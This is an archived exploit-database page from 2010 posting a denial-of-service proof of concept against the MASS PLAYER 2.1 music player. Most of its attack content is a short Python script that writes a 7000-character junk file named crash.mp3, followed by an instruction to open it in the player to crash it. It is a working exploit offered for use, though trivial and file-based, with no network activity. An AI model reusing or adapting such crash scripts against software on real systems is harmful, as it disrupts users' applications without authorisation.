[dos / poc] - MASS PLAYER 2.1 Denial of Service
Posted on 19 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>MASS PLAYER 2.1 Denial of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='MASS PLAYER 2.1 Denial of Service by Sweet in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================= MASS PLAYER 2.1 Denial of Service ================================= #Exploit Title :MASS PLAYER 2.1 Denial of service vulnerability #Software : MASS PLAYER 2.1 #Software link :http://sourceforge.net/projects/massmusicplayer/ #Autor : Sweet #Email : charif38@hotmail.fr #Date : 19/10/2010 #Software version : 2.1 #Tested on : WinXP sp3 ENG #!/usr/bin/python #thx to Milw0rm.com , JF - Hamst0r - Keystroke) R.I.P , inj3ct0r.com , exploit-db.com, packetstormsecurity.org, http://ha.ckers.org #et 1,2,3 viva L'Algerie outfile="crash.mp3" junk="x41" * 7000 FILE=open(outfile, "w") FILE.write(junk) FILE.close() print ''' File created succesufully , open it with MASS player and press the Play button ''' # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-19]</pre></body></html>